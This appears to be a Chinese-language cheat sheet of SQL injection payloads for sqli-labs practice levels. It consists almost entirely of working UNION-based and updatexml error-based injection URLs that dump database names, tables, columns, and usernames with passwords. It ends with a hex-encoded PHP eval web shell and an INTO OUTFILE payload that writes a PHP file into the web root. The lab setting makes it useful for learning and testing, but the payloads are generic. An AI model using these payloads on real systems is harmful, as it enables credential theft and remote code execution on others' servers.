爆库
http://www.guiltyfet.com/sqli/Less-41/?id=0 union%20select 1,version(),database() %23

爆表
http://www.guiltyfet.com/sqli/Less-41/?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

爆字段
http://www.guiltyfet.com/sqli/Less-41/?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

爆密码
http://www.guiltyfet.com/sqli/Less-41/?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

利用报错注入
爆库
http://www.guiltyfet.com/sqli/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)--+

表
http://www.guiltyfet.com/sqli/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

查看users表下的所有字段
http://www.guiltyfet.com/sqli/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+

查看username,password字段下的所有值
http://www.guiltyfet.com/sqli/Less-46/?sort=1 and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1)--+

http://www.guiltyfet.com/sqli/Less-47/?sort=1' and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1)--+

其中lines terminates by将每行以指定字符串结尾：
0x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e = hex(<?php eval($_POST["cmd"]);?>)

http://www.guiltyfet.com/sqli/Less-49/?sort=1%27into%20outfile%20%22D:\\phpstudy_pro\\WWW\\www.guiltyfet.com\\sqli\\Less-49\\149.php%22%20lines%20terminated%20by%200x3c3f70687020706870696e666f28293b3f3e2020--+